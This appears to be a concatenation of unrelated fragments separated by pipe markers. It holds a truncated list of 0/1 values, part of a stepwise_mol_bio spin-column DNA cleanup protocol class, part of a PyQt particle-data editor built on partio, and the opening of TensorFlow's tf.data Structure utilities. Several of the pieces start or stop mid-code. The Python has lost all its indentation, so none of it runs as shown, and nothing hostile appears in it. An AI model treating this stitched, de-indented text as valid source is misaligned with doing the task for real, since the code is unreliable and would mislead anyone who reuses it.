[0, 0, 0, 0, 0, 1, 1, 0, 1, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 1, 0, 0, 0, 0, | |
<filename>stepwise_mol_bio/spin_cleanup.py
#!/usr/bin/env python3
import stepwise, appcli, autoprop
from inform import warn
from appcli import Key, Method, DocoptConfig
from stepwise import StepwiseConfig, PresetConfig, Quantity, oxford_comma
from stepwise_mol_bio import Cleanup, format_sec
from freezerbox import MakerConfig, group_by_identity, parse_volume_uL, unanimous
from more_itertools import always_iterable
def ng_uL(x):
return Quantity(x, 'ng/µL')
@autoprop
class SpinCleanup(Cleanup):
"""\
Purify a PCR reaction using a silica spin column.
Usage:
spin_cleanup [<preset>] [-s <µL>] [-d <buffer>] [-v <µL>]
<%! from stepwise_mol_bio import hanging_indent %>\
Arguments:
<preset> [default: ${app.preset}]
The default parameters to use. Typically these correspond to
commercial kits:
${hanging_indent(app.preset_briefs, 8*' ')}
Options:
-s --sample-volume <µL>
The volume of the sample, in µL.
-d --elute-buffer <name>
The buffer to elute in.
-v --elute-volume <µL>
The volume of purified DNA/RNA to elute, in µL. The default value
depends on the preset, but can usually be lowered to get more
concentrated product. A warning will be displayed if the requested
volume is lower than the minimum recommended by the kit manufacturer.
Configuration:
Default values for this protocol can be specified in any of the following
stepwise configuration files:
${hanging_indent(app.config_paths, 8)}
molbio.spin_cleanup.default_preset:
The default value for the `--preset` option.
molbio.spin_cleanup.presets:
Named groups of default reaction parameters. Typically each preset
corresponds to a particular kit or protocol. See below for the various
settings that can be specified in each preset.
molbio.spin_cleanup.presets.<name>.protocol_name
How to refer to the whole protocol. Commonly this is the name of the
spin column kit.
molbio.spin_cleanup.presets.<name>.protocol_link
A link (typically minified) to the complete protocol, e.g. as published
by the manufacturer of the columns. This is not required, but if
specified, will be included in the protocol as a footnote.
molbio.spin_cleanup.presets.<name>.column_name
How to refer to the specific spin column used in the protocol.
molbio.spin_cleanup.presets.<name>.spin_speed_g
How fast to spin the column in each centrifugation step, in units of
g-force.
molbio.spin_cleanup.presets.<name>.column_capacity_ug
The maximum binding capacity of the column, in µg. This information is
added to the protocol as a footnote.
molbio.spin_cleanup.presets.<name>.sample_type
How to generically refer to the sample in the protocol, e.g. "DNA".
molbio.spin_cleanup.presets.<name>.sample_volume_uL
The volume of sample to load on the column, in µL. Alternatively, this
can be a dictionary with keys 'min' and/or 'max' specifying the minimum
and maximum allowed sample volumes, respectively.
molbio.spin_cleanup.presets.<name>.bind_buffer
The name(s) of the buffer(s) to use to bind the sample to column. This
can be either a string or a list of strings. Use a list to specify
that multiple buffers (e.g. binding buffer and ethanol) should be mixed
with the sample before it is loaded on the column. If this option is a
list, the `bind_volume_uL` and `bind_volume_x` options must also be
lists of the same length (or left unspecified).
molbio.spin_cleanup.presets.<name>.bind_volume_uL
How much `bind_buffer` to use, in µL. This can be either a number or a
list of numbers; see `bind_buffer` for more details. This takes
precedence over the `bind_volume_x` setting.
molbio.spin_cleanup.presets.<name>.bind_volume_x
How much `bind_buffer` to use, as a multiple of the sample volume.
This can be a number or a list of numbers; see `bind_buffer` for more
details. This is superseded by the `bind_volume_uL` setting.
molbio.spin_cleanup.presets.<name>.bind_spin_sec
How long to centrifuge the column during the bind step.
molbio.spin_cleanup.presets.<name>.bind_vacuum
Whether or not to use a vacuum manifold for the bind step. The default
is False. If True, the `bind_spin_sec` option is ignored.
molbio.spin_cleanup.presets.<name>.pH_buffer
The name of the buffer to use when adjusting the pH of the sample.
molbio.spin_cleanup.presets.<name>.pH_volume_uL
How much `pH_buffer` to use, in µL. This takes precedence over the
`pH_volume_x` setting.
molbio.spin_cleanup.presets.<name>.pH_volume_x
How much `pH_buffer` to use, as a multiple of the sample volume.
This is superseded by the `pH_volume_uL` setting.
molbio.spin_cleanup.presets.<name>.pH_color
The color the sample/binding buffer should be after reaching the
correct pH.
molbio.spin_cleanup.presets.<name>.wash_buffer
The name of the buffer to use when washing the column. This can either
be a string or a list of strings. Use a list to specify that there
should be multiple wash steps. If this option is a list, the
`wash_volume_uL`, `wash_spin_sec`, and `wash_vacuum` options must also
be lists of the same length (or left unspecified).
molbio.spin_cleanup.presets.<name>.wash_volume_uL
The volume of `wash_buffer` to use, in µL. This can either be a number
or a list of numbers; see `wash_buffer` for more details.
molbio.spin_cleanup.presets.<name>.wash_spin_sec
How long to centrifuge the column during the wash step. This can
either be a number or a list of numbers; see `wash_buffer` for more
details.
molbio.spin_cleanup.presets.<name>.wash_vacuum
Whether or not to use a vacuum manifold for the wash step. This can
either be a boolean or a list of booleans; see `wash_buffer` for more
details. The default is False. If True, the `wash_spin_sec` option is
ignored.
molbio.spin_cleanup.presets.<name>.dry_spin_sec
How long to centrifuge the column after the wash step(s), e.g. to
remove any residual ethanol. If left unspecified, this step will not
be included in the protocol.
molbio.spin_cleanup.presets.<name>.elute_buffer
The default value for the `--elute-buffer` flag.
molbio.spin_cleanup.presets.<name>.elute_volume_uL
The default value for the `--elute-volume` flag.
molbio.spin_cleanup.presets.<name>.elute_min_volume_uL
The minimum recommended volume to elute in. Smaller volumes can still
be specified, but will be accompanied by a warning.
molbio.spin_cleanup.presets.<name>.elute_wait_sec
How long to incubate the column with elution buffer before eluting, in
seconds.
molbio.spin_cleanup.presets.<name>.elute_spin_sec
How long to centrifuge the column when eluting.
Database:
Spin-column cleanup protocols can appear in the "Cleanups" column of a
FreezerBox database:
spin-cleanup [<preset>] [volume=<µL>] [buffer=<name>]
<preset>
See `<preset>`.
volume=<µL>
See `--elute-volume`. Must specify a unit.
buffer=<µL>
See `--elute-buffer`.
"""
__config__ = [
DocoptConfig,
MakerConfig,
PresetConfig,
StepwiseConfig.setup('molbio.spin_cleanup'),
]
preset_briefs = appcli.config_attr()
config_paths = appcli.config_attr()
preset_brief_template = '{protocol_name}'
presets = appcli.param(
Key(StepwiseConfig, 'presets'),
pick=list,
)
preset = appcli.param(
Key(DocoptConfig, '<preset>'),
Key(MakerConfig, 1),
Key(StepwiseConfig, 'default_preset'),
)
protocol_name = appcli.param(
Key(PresetConfig, 'protocol_name'),
)
protocol_link = appcli.param(
Key(PresetConfig, 'protocol_link'),
default=None,
)
column_name = appcli.param(
Key(PresetConfig, 'column_name'),
default='silica spin column',
)
spin_speed_g = appcli.param(
Key(PresetConfig, 'spin_speed_g'),
default=None,
)
column_capacity_ug = appcli.param(
Key(PresetConfig, 'column_capacity_ug'),
default=None,
)
sample_type = appcli.param(
Key(PresetConfig, 'sample_type'),
default='DNA',
)
sample_volume_uL = appcli.param(
Key(DocoptConfig, '--sample-volume', cast=float),
default=None,
)
target_sample_volume_uL = appcli.param(
Key(PresetConfig, 'sample_volume_uL'),
default=None,
)
bind_buffer = appcli.param(
Key(PresetConfig, 'bind_buffer'),
)
bind_volume_uL = appcli.param(
Key(PresetConfig, 'bind_volume_uL'),
default=None
)
bind_volume_x = appcli.param(
Key(PresetConfig, 'bind_volume_x'),
default=None
)
bind_spin_sec = appcli.param(
Key(PresetConfig, 'bind_spin_sec'),
default=None
)
bind_vacuum = appcli.param(
Key(PresetConfig, 'bind_vacuum'),
default=False,
)
ph_buffer = appcli.param(
Key(PresetConfig, 'pH_buffer'),
default=None,
)
ph_volume_uL = appcli.param(
Key(PresetConfig, 'pH_volume_uL'),
default=None
)
ph_volume_x = appcli.param(
Key(PresetConfig, 'pH_volume_x'),
default=None
)
ph_color = appcli.param(
Key(PresetConfig, 'pH_color'),
)
wash_buffer = appcli.param(
Key(PresetConfig, 'wash_buffer'),
)
wash_volume_uL = appcli.param(
Key(PresetConfig, 'wash_volume_uL'),
)
wash_spin_sec = appcli.param(
Key(PresetConfig, 'wash_spin_sec'),
default=None,
)
wash_vacuum = appcli.param(
Key(PresetConfig, 'wash_vacuum'),
default=False,
)
dry_spin_sec = appcli.param(
Key(PresetConfig, 'dry_spin_sec'),
default=None,
)
elute_buffer = appcli.param(
Key(DocoptConfig, '--elute-buffer'),
Key(MakerConfig, 'buffer'),
Key(PresetConfig, 'elute_buffer'),
)
elute_volume_uL = appcli.param(
Key(DocoptConfig, '--elute-volume', cast=float),
Key(MakerConfig, 'volume', cast=parse_volume_uL),
Key(PresetConfig, 'elute_volume_uL'),
)
elute_min_volume_uL = appcli.param(
Key(PresetConfig, 'elute_min_volume_uL'),
default=None,
)
elute_wait_sec = appcli.param(
Key(PresetConfig, 'elute_wait_sec'),
default=None,
)
elute_spin_sec = appcli.param(
Key(PresetConfig, 'elute_spin_sec'),
)
group_by = {
'preset': group_by_identity,
'elute_buffer': group_by_identity,
'elute_volume_uL': group_by_identity,
}
def __init__(self, preset=None):
if preset is not None:
self.preset = preset
def get_protocol(self):
p = stepwise.Protocol()
pl = stepwise.paragraph_list()
ul = stepwise.unordered_list()
def break_if_too_long(pl, ul, n=4):
if len(ul) > n:
ul = stepwise.unordered_list()
pl += ul
return ul
footnotes = []
if self.protocol_link:
footnotes.append(self.protocol_link)
if self.column_capacity_ug:
footnotes.append(f"Column capacity: {self.column_capacity_ug} µg")
if self.product_tags and self.show_product_tags:
product_tags = oxford_comma(self.product_tags) + ' '
else:
product_tags = ''
p += pl
pl += f"Purify {product_tags}using {self.protocol_name}{p.add_footnotes(*footnotes)}:"
pl += ul
if self.spin_speed_g:
ul += f"Perform all spin steps at {self.spin_speed_g}g."
## Dilute
if x := self.target_sample_volume_uL:
v = self.sample_volume_uL
if not isinstance(x, dict):
target = f'{x} µL'
skip = v and v == x
self.sample_volume_uL = x
elif 'min' in x and 'max' in x:
target = f"between {x['min']}–{x['max']} µL"
skip = v and x['min'] <= v <= x['max']
elif 'min' in x:
target = f"at least {x['min']} µL"
skip = v | |
primary widget for table entries representing a particle attribute """
widgetNumber = 0
def __init__(self, value, data, attr, particleNum, numColumns, parent=None):
QWidget.__init__(self, parent)
self.value = value
self.data = data
self.attr = attr
self.particleNum = particleNum
self.setFrameShape(QFrame.NoFrame)
self.name = 'AttrWidget{}'.format(AttrWidget.widgetNumber)
self.setObjectName(self.name)
AttrWidget.widgetNumber += 1
self.withBorderStyle = '#%s {border: 1px solid dodgerblue;}' % self.name
self.noBorderStyle = '#%s {border: 0px;}' % self.name
self.setStyleSheet(self.noBorderStyle)
layout = QVBoxLayout()
layout.setContentsMargins(0,0,0,0)
self.setLayout(layout)
idx = 0
self.items = []
self.textValues = []
numRows = int(math.ceil(len(value) / float(numColumns)))
for _ in range(numRows):
row = QHBoxLayout()
layout.addLayout(row)
for _ in range(numColumns):
item = NumericalEdit(value[idx])
self.textValues.append(str(value[idx]))
item.editingFinished.connect(self.applyEdit)
row.addWidget(item, Qt.AlignHCenter|Qt.AlignTop)
self.items.append(item)
idx += 1
if idx == len(self.value):
break
#--------------------------------------------------------------------------
def applyEdit(self):
""" Callback when editing finished on a cell. Sets data value. """
newValue = []
changed = False
for i, item in enumerate(self.items):
text = item.text()
if text != self.textValues[i]:
changed = True
if isinstance(self.value[0], int):
newValue.append(int(text))
else:
newValue.append(float(text))
item.clearFocus()
if changed:
self.value = tuple(newValue)
if self.particleNum >= 0:
self.data.set(self.attr, self.particleNum, self.value)
else:
self.data.setFixed(self.attr, self.value)
self.drawBorder(True)
#--------------------------------------------------------------------------
def drawBorder(self, border):
""" Sets or clears the border around the frame """
if border:
self.setStyleSheet(self.withBorderStyle)
else:
self.setStyleSheet(self.noBorderStyle)
#------------------------------------------------------------------------------
def getWidget(value, data, attr, particleNum=-1):
""" Returns the correct type of QWidget based off of the item type.
A particleNum<0 means a fixed attribute.
"""
if isinstance(value, tuple):
size = len(value)
if size == 16:
result = AttrWidget(value, data, attr, particleNum, 4)
elif size == 9:
result = AttrWidget(value, data, attr, particleNum, 3)
else:
result = AttrWidget(value, data, attr, particleNum, size)
else:
result = QLabel(str(value))
return result
#------------------------------------------------------------------------------
#------------------------------------------------------------------------------
class ParticleTableWidget(QTableWidget): # pylint:disable=R0903
""" A QTableWidget interfacing with ParticleData"""
def __init__(self, data, parent=None):
QTableWidget.__init__(self, parent)
self.data = data
# Connect data signals to my slots
self.data.particleAdded.connect(self.particleAddedSlot)
self.data.attributeAdded.connect(self.attributeAddedSlot)
self.data.dataReset.connect(self.dataResetSlot)
self.data.dirtied.connect(self.dataDirtiedSlot)
style = 'QTableWidget::item { border: 1px solid gray; }'
self.setStyleSheet(style)
self.ignoreSignals = False
self.populate()
#--------------------------------------------------------------------------
def populate(self):
""" Populate the table with the data """
self.clear()
numAttr = self.data.numAttributes()
numParticles = self.data.numParticles()
self.attrs = getAttrs(self.data.numAttributes, self.data.attributeInfo, True)
self.setColumnCount(numAttr)
self.setRowCount(numParticles)
self.horizontalHeader().setSectionResizeMode(QHeaderView.Interactive)
for col, (_, attr) in enumerate(self.attrs):
item = QTableWidgetItem(attr.name)
tooltip = '<p><tt> Name: {}<br> Type: {}<br>Count: {}</tt></p>'.\
format(attr.name, partio.TypeName(attr.type), attr.count)
item.setToolTip(tooltip)
self.setHorizontalHeaderItem(col, item)
self.horizontalHeader().setStretchLastSection(False)
self.setVerticalHeaderLabels([str(pnum) for pnum in range(numParticles)])
self.setTabKeyNavigation(True)
self.horizontalHeader().setSectionsMovable(False)
# Populate it with the particle data
self.widgets = []
for pnum in range(numParticles):
self.populateParticle(pnum)
self.horizontalHeader().resizeSections(QHeaderView.ResizeToContents)
self.verticalHeader().resizeSections(QHeaderView.ResizeToContents)
#--------------------------------------------------------------------------
def populateParticle(self, pnum, border=False):
""" Populates the table with a new particle - a full row """
for col, (_, attr) in enumerate(self.attrs):
self.populateAttribute(pnum, col, attr, border)
#--------------------------------------------------------------------------
def populateAttribute(self, pnum, col, attr, border=False):
""" Populates a single cell in the table """
value = self.data.get(attr, pnum)
widget = getWidget(value, self.data, attr, pnum)
if border:
widget.drawBorder(border)
self.setCellWidget(pnum, col, widget)
self.widgets.append(widget)
#--------------------------------------------------------------------------
def keyPressEvent(self, event):
""" Handles certain keys """
if event.key() in (Qt.Key_Delete, Qt.Key_Backspace):
self.handleDeleteKey(event)
else:
QTableWidget.keyPressEvent(self, event)
#--------------------------------------------------------------------------
def handleDeleteKey(self, event): # pylint:disable=W0613
""" Handles the delete or backspace key """
model = self.selectionModel()
rows = model.selectedRows()
columns = model.selectedColumns()
if not rows and not columns:
return
# Ignore signals as we rebuild
self.ignoreSignals = True
if rows:
particles = [row.row() for row in rows]
self.data.removeParticles(particles)
if columns:
indices = [col.column() for col in columns]
attributes = [str(self.horizontalHeaderItem(index).text()) for index in indices]
self.data.removeAttributes(attributes)
self.ignoreSignals = False
self.dataResetSlot()
#--------------------------------------------------------------------------
def particleAddedSlot(self, index): # pylint:disable=W0613
""" SLOT when a particle is added """
if self.ignoreSignals:
return
numParticles = self.data.numParticles()
self.setRowCount(numParticles)
self.populateParticle(numParticles-1, True)
self.verticalHeader().resizeSections(QHeaderView.ResizeToContents)
#--------------------------------------------------------------------------
def attributeAddedSlot(self, name): # pylint:disable=W0613
""" SLOT when attribute is added """
numAttrs = self.data.numAttributes()
anum = numAttrs - 1
name = str(name) # partio doesn't like unicode
attr = self.data.attributeInfo(name)
self.attrs.append((anum, attr))
self.setColumnCount(numAttrs)
self.setHorizontalHeaderItem(numAttrs-1, QTableWidgetItem(attr.name))
for pnum in range(self.data.numParticles()):
self.populateAttribute(pnum, anum, attr, True)
self.verticalHeader().resizeSections(QHeaderView.ResizeToContents)
#--------------------------------------------------------------------------
def dataResetSlot(self):
""" SLOT when particle data is reconstructed """
if not self.ignoreSignals:
self.populate()
#--------------------------------------------------------------------------
def dataDirtiedSlot(self, dirty):
""" SLOT when the particle data is dirtied or cleaned.
When cleaned, reset the style sheets on widgets for border.
"""
if not dirty:
for widget in self.widgets:
widget.drawBorder(False)
#------------------------------------------------------------------------------
class FixedAttributesWidget(QWidget):
""" A widget for viewing/editing fixed attributes (non-varying) """
def __init__(self, data, parent=None):
QWidget.__init__(self, parent)
self.data = data
vbox = QVBoxLayout()
self.setLayout(vbox)
title = QLabel('Fixed Attributes')
vbox.addWidget(title)
self.frame = QFrame()
vbox.addWidget(self.frame)
self.vbox = QVBoxLayout()
self.frame.setLayout(self.vbox)
self.frame.setFrameShape(QFrame.Panel)
self.frame.setFrameShadow(QFrame.Sunken)
self.table = QTableWidget()
self.table.horizontalHeader().hide()
self.vbox.addWidget(self.table)
self.table.hide()
self.noAttrLabel = QLabel('<i>No fixed attributes</i>')
self.vbox.addWidget(self.noAttrLabel)
self.widgets = []
self.populate()
self.data.fixedAttributeAdded.connect(self.fixedAttributeAddedSlot)
self.data.dataReset.connect(self.dataResetSlot)
self.data.dirtied.connect(self.dataDirtiedSlot)
def dataDirtiedSlot(self, dirty):
""" SLOT when the particle data is dirtied or cleaned."""
if not dirty:
for widget in self.widgets:
widget.drawBorder(False)
def dataResetSlot(self):
""" SLOT when particle data is reconstructed """
self.populate()
def fixedAttributeAddedSlot(self, name): #pylint:disable=W0613
""" SLOT when a fixed attribute is added to the particle set """
self.populate()
def populate(self):
""" Populates the table of fixed attributes """
self.widgets = []
# If no widgets, just drop that in
numAttrs = self.data.numFixedAttributes()
if not numAttrs:
self.table.hide()
self.noAttrLabel.show()
return
self.table.show()
self.noAttrLabel.hide()
self.table.setColumnCount(1)
self.table.setRowCount(numAttrs)
self.attrs = getAttrs(self.data.numFixedAttributes, self.data.fixedAttributeInfo, True)
for row, (_, attr) in enumerate(self.attrs):
item = QTableWidgetItem(attr.name)
tooltip = '<p><tt> Name: {}<br> Type: {}<br>Count: {}</tt></p>'.\
format(attr.name, partio.TypeName(attr.type), attr.count)
item.setToolTip(tooltip)
self.table.setVerticalHeaderItem(row, item)
value = self.data.getFixed(attr)
widget = getWidget(value, self.data, attr)
self.table.setCellWidget(row, 0, widget)
self.widgets.append(widget)
self.table.horizontalHeader().setStretchLastSection(False)
self.table.setTabKeyNavigation(True)
self.table.horizontalHeader().setSectionsMovable(False)
self.table.horizontalHeader().resizeSections(QHeaderView.ResizeToContents)
self.table.verticalHeader().resizeSections(QHeaderView.ResizeToContents)
class IndexedStringsWidget(QWidget):
""" Holds the list of indexed string attributes """
def __init__(self, data, parent=None):
QWidget.__init__(self, parent)
self.data = data
vbox = QVBoxLayout()
self.setLayout(vbox)
title = QLabel('Indexed Strings')
vbox.addWidget(title)
self.frame = QFrame()
vbox.addWidget(self.frame)
self.vbox = QVBoxLayout()
self.frame.setLayout(self.vbox)
self.frame.setFrameShape(QFrame.Panel)
self.frame.setFrameShadow(QFrame.Sunken)
self.table = QTableWidget()
self.table.horizontalHeader().hide()
self.vbox.addWidget(self.table)
self.table.hide()
self.noStringsLabel = QLabel('<i>No indexed strings</i>')
self.vbox.addWidget(self.noStringsLabel)
self.widgets = []
self.populate()
self.data.attributeAdded.connect(self.attributeAddedSlot)
self.data.dataReset.connect(self.dataResetSlot)
self.data.dirtied.connect(self.dataDirtiedSlot)
def dataDirtiedSlot(self, dirty):
""" SLOT when the particle data is dirtied or cleaned."""
if not dirty:
for widget in self.widgets:
widget.drawBorder(False)
def dataResetSlot(self):
""" SLOT when particle data is reconstructed """
self.populate()
def attributeAddedSlot(self, name): #pylint:disable=W0613
""" SLOT when an attribute is added to the particle set """
attr = self.data.attributeInfo(name)
if attr.type == partio.INDEXEDSTR:
self.populate()
def populate(self):
""" Populates the table of indexed strings """
self.widgets = []
# If no widgets, just drop that in
attrs = []
for anum in range(self.data.numAttributes()):
attr = self.data.attributeInfo(anum)
if attr.type == partio.INDEXEDSTR:
attrs.append(attr)
if not attrs:
self.table.hide()
self.noStringsLabel.show()
return
self.table.show()
self.noStringsLabel.hide()
self.table.setColumnCount(1)
self.table.setRowCount(len(attrs))
for row, attr in enumerate(attrs):
item = QTableWidgetItem(attr.name)
self.table.setVerticalHeaderItem(row, item)
strings = self.data.indexedStrs(attr)
table = QTableWidget()
table.setColumnCount(1)
table.setRowCount(len(strings))
table.horizontalHeader().hide()
table.setVerticalHeaderLabels([str(i) for i in range(len(strings))])
for i, string in enumerate(strings):
widget = QLabel(string)
table.setCellWidget(i, 0, widget)
self.widgets.append(widget)
self.table.setCellWidget(row, 0, table)
self.table.horizontalHeader().setStretchLastSection(False)
self.table.setTabKeyNavigation(True)
self.table.horizontalHeader().setSectionsMovable(False)
self.table.horizontalHeader().resizeSections(QHeaderView.ResizeToContents)
self.table.verticalHeader().resizeSections(QHeaderView.ResizeToContents)
#------------------------------------------------------------------------------
#------------------------------------------------------------------------------
class PartEdit(QMainWindow):
""" Main window / editor """
def __init__(self, parent=None):
QMainWindow.__init__(self, parent)
self.data = ParticleData()
toolbar = self.addToolBar("Test")
openButton = QPushButton("")
openButton.setFlat(True)
openButton.setIconSize( QSize(32, 32) )
openButton.setIcon(QIcon("/jobs2/soft/icons/dlight/open.png"))
openButton.setToolTip( "Open File" )
toolbar.addWidget(openButton)
openButton.clicked.connect(self.openSlot)
QShortcut( QKeySequence(Qt.CTRL + Qt.Key_O), self, self.openSlot )
saveButton = QPushButton("")
saveButton.setFlat(True)
saveButton.setIconSize( QSize(32, 32) )
saveButton.setIcon(QIcon("/jobs2/soft/icons/dlight/file_save.png"))
saveButton.setToolTip( "Save File" )
toolbar.addWidget(saveButton)
saveButton.clicked.connect(self.saveSlot)
QShortcut( QKeySequence(Qt.CTRL + Qt.Key_S), self, self.saveSlot )
saveDeltaButton = QPushButton("")
saveDeltaButton.setFlat(True)
saveDeltaButton.setIconSize( QSize(32, 32) )
saveDeltaButton.setIcon(QIcon("/jobs2/soft/icons/dlight/file_save_as.png"))
saveDeltaButton.setToolTip( "Save File As Delta" )
toolbar.addWidget(saveDeltaButton)
saveDeltaButton.clicked.connect(self.saveDeltaSlot)
QShortcut( QKeySequence(Qt.CTRL + Qt.SHIFT + Qt.Key_S), self, self.saveDeltaSlot )
addParticleButton = QPushButton("Particle")
addParticleButton.setFlat(True)
addParticleButton.setIconSize( QSize(32, 32) )
addParticleButton.setIcon(QIcon("/jobs2/soft/icons/shared/plus.png"))
addParticleButton.setToolTip( "Add Particle" )
toolbar.addWidget(addParticleButton)
addParticleButton.clicked.connect(self.addParticleSlot)
addAttributeButton = QPushButton("Attribute")
addAttributeButton.setFlat(True)
addAttributeButton.setIconSize( QSize(32, 32) )
addAttributeButton.setIcon(QIcon("/jobs2/soft/icons/shared/plus.png"))
addAttributeButton.setToolTip( "Add Attribute" )
toolbar.addWidget(addAttributeButton)
addAttributeButton.clicked.connect(self.addAttributeSlot)
splitter = QSplitter(self)
self.setCentralWidget(splitter)
particleTable = ParticleTableWidget(self.data, self)
splitter.addWidget(particleTable)
right = QWidget(self)
splitter.addWidget(right)
vbox = QVBoxLayout(right)
right.setLayout(vbox)
fixedAttrWidget = FixedAttributesWidget(self.data, self)
vbox.addWidget(fixedAttrWidget)
indexedStrings = IndexedStringsWidget(self.data, self)
vbox.addWidget(indexedStrings)
vbox.addStretch()
# TODD: SCROLLABLE AREAS FOR EVERYTHING
self.data.dirtied.connect(self.dataDirtiedSlot)
# Configure ctrl-w to close the window
QShortcut( QKeySequence(Qt.CTRL + Qt.Key_W), self, self.close )
#--------------------------------------------------------------------------
def openSlot(self):
""" Callback from Open button """
# TODO: Check for edits and prompt to save dirty
if self.data.filename:
dirname = os.path.dirname(self.data.filename)
else:
dirname = os.getcwd()
filename = QFileDialog.getOpenFileName(self, "Open particle file", dirname, "(*.bgeo *.geo *.bhclassic *.ptc *.pdb)")
if filename:
if isinstance(filename, tuple):
filename = filename[0]
self.open(str(filename))
#--------------------------------------------------------------------------
def open(self, filename):
""" Opens a file from disk and populates the UI """
self.data.read(filename)
self.setWindowTitle(filename)
#--------------------------------------------------------------------------
def setData(self, particleSet):
""" Uses the given particle set as its data """
self.data.setData(particleSet)
#--------------------------------------------------------------------------
def saveSlot(self):
""" Callback from Save button """
self.save(False)
#--------------------------------------------------------------------------
def | |
# Copyright 2018 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Utilities for describing the structure of a `tf.data` type."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import abc
from tensorflow.python.data.util import nest
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.framework import sparse_tensor as sparse_tensor_lib
from tensorflow.python.framework import tensor_shape
from tensorflow.python.framework import tensor_util
from tensorflow.python.ops import list_ops
from tensorflow.python.ops import sparse_ops
from tensorflow.python.ops import tensor_array_ops
from tensorflow.python.util.tf_export import tf_export
_STRUCTURE_CONVERSION_FUNCTION_REGISTRY = {}
class Structure(object):
"""Represents structural information, such as type and shape, about a value.
A `Structure` generalizes the `tf.Tensor.dtype` and `tf.Tensor.shape`
properties, so that we can define generic containers of objects including:
* `tf.Tensor`
* `tf.SparseTensor`
* Nested structures of the above.
TODO(b/110122868): In the future, a single `Structure` will replace the
`tf.data.Dataset.output_types`, `tf.data.Dataset.output_shapes`,
and `tf.data.Dataset.output_classes`, and similar properties and arguments in
the `tf.data.Iterator` and `Optional` classes.
"""
__metaclass__ = abc.ABCMeta
@abc.abstractproperty
def _flat_shapes(self):
"""A list of shapes matching the shapes of `self._to_tensor_list()`.
Returns:
A list of `tf.TensorShape` objects.
"""
raise NotImplementedError("Structure._flat_shapes")
@abc.abstractproperty
def _flat_types(self):
"""A list of types matching the types of `self._to_tensor_list()`.
Returns:
A list of `tf.DType` objects.
"""
raise NotImplementedError("Structure._flat_shapes")
@abc.abstractmethod
def is_compatible_with(self, other):
"""Returns `True` if `other` is compatible with this structure.
A structure `t` is a "subtype" of `s` if:
* `s` and `t` are instances of the same `Structure` subclass.
* The nested structures (if any) of `s` and `t` are the same, according to
`tf.contrib.framework.nest.assert_same_structure`, and each nested
structure of `t` is a "subtype" of the corresponding nested structure of
`s`.
* Any `tf.DType` components of `t` are the same as the corresponding
components in `s`.
* Any `tf.TensorShape` components of `t` are compatible with the
corresponding components in `s`, according to
`tf.TensorShape.is_compatible_with`.
Args:
other: A `Structure`.
Returns:
`True` if `other` is a subtype of this structure, otherwise `False`.
"""
raise NotImplementedError("Structure.is_compatible_with()")
@abc.abstractmethod
def _to_tensor_list(self, value):
"""Returns a flat list of `tf.Tensor` representing `value`.
This method can be used, along with `self._flat_shapes` and
`self._flat_types` to represent structured values in lower level APIs
(such as plain TensorFlow operations) that do not understand structure.
Requires: `self.is_compatible_with(Structure.from_value(value))`.
Args:
value: A value with compatible structure.
Returns:
A flat list of `tf.Tensor` representing `value`.
"""
raise NotImplementedError("Structure._to_tensor_list()")
@abc.abstractmethod
def _from_tensor_list(self, flat_value):
"""Builds a flat list of `tf.Tensor` into a value matching this structure.
Requires: The shapes and types of the tensors in `flat_value` must be
compatible with `self._flat_shapes` and `self._flat_types` respectively.
Args:
flat_value: A list of `tf.Tensor` with compatible flat structure.
Returns:
A structured object matching this structure.
"""
raise NotImplementedError("Structure._from_tensor_list()")
@staticmethod
def from_value(value):
"""Returns a `Structure` that represents the given `value`.
Args:
value: A potentially structured value.
Returns:
A `Structure` that is compatible with `value`.
Raises:
TypeError: If a structure cannot be built for `value`, because its type
or one of its component types is not supported.
"""
# TODO(b/110122868): Add support for custom types and Dataset to this
# method.
if isinstance(
value,
(sparse_tensor_lib.SparseTensor, sparse_tensor_lib.SparseTensorValue)):
return SparseTensorStructure.from_value(value)
elif isinstance(value, tensor_array_ops.TensorArray):
return TensorArrayStructure.from_value(value)
elif isinstance(value, (tuple, dict)):
return NestedStructure.from_value(value)
else:
for converter_type, converter_fn in (
_STRUCTURE_CONVERSION_FUNCTION_REGISTRY.items()):
if isinstance(value, converter_type):
return converter_fn(value)
try:
tensor = ops.convert_to_tensor(value)
except (ValueError, TypeError):
raise TypeError("Could not build a structure for %r" % value)
return TensorStructure.from_value(tensor)
@staticmethod
def _from_legacy_structure(output_types, output_shapes, output_classes):
"""Returns a `Structure` that represents the given legacy structure.
This method provides a way to convert from the existing `Dataset` and
`Iterator` structure-related properties to a `Structure` object.
TODO(b/110122868): Remove this method once `Structure` is used throughout
`tf.data`.
Args:
output_types: A nested structure of `tf.DType` objects corresponding to
each component of a structured value.
output_shapes: A nested structure of `tf.TensorShape` objects
corresponding to each component a structured value.
output_classes: A nested structure of Python `type` objects corresponding
to each component of a structured value.
Returns:
A `Structure`.
Raises:
TypeError: If a structure cannot be built the arguments, because one of
the component classes in `output_classes` is not supported.
"""
flat_types = nest.flatten(output_types)
flat_shapes = nest.flatten(output_shapes)
flat_classes = nest.flatten(output_classes)
flat_ret = []
for flat_type, flat_shape, flat_class in zip(flat_types, flat_shapes,
flat_classes):
if issubclass(flat_class, sparse_tensor_lib.SparseTensor):
flat_ret.append(SparseTensorStructure(flat_type, flat_shape))
elif issubclass(flat_class, ops.Tensor):
flat_ret.append(TensorStructure(flat_type, flat_shape))
else:
# NOTE(mrry): Since legacy structures produced by iterators only
# comprise Tensors, SparseTensors, and nests, we do not need to support
# all structure types here.
raise TypeError(
"Could not build a structure for output class %r" % flat_type)
ret = nest.pack_sequence_as(output_classes, flat_ret)
if isinstance(ret, Structure):
return ret
else:
return NestedStructure(ret)
@staticmethod
def _register_custom_converter(type_object, converter_fn):
"""Registers `converter_fn` for converting values of the given type.
Args:
type_object: A Python `type` object representing the type of values
accepted by `converter_fn`.
converter_fn: A function that takes one argument (an instance of the
type represented by `type_object`) and returns a `Structure`.
"""
_STRUCTURE_CONVERSION_FUNCTION_REGISTRY[type_object] = converter_fn
@abc.abstractmethod
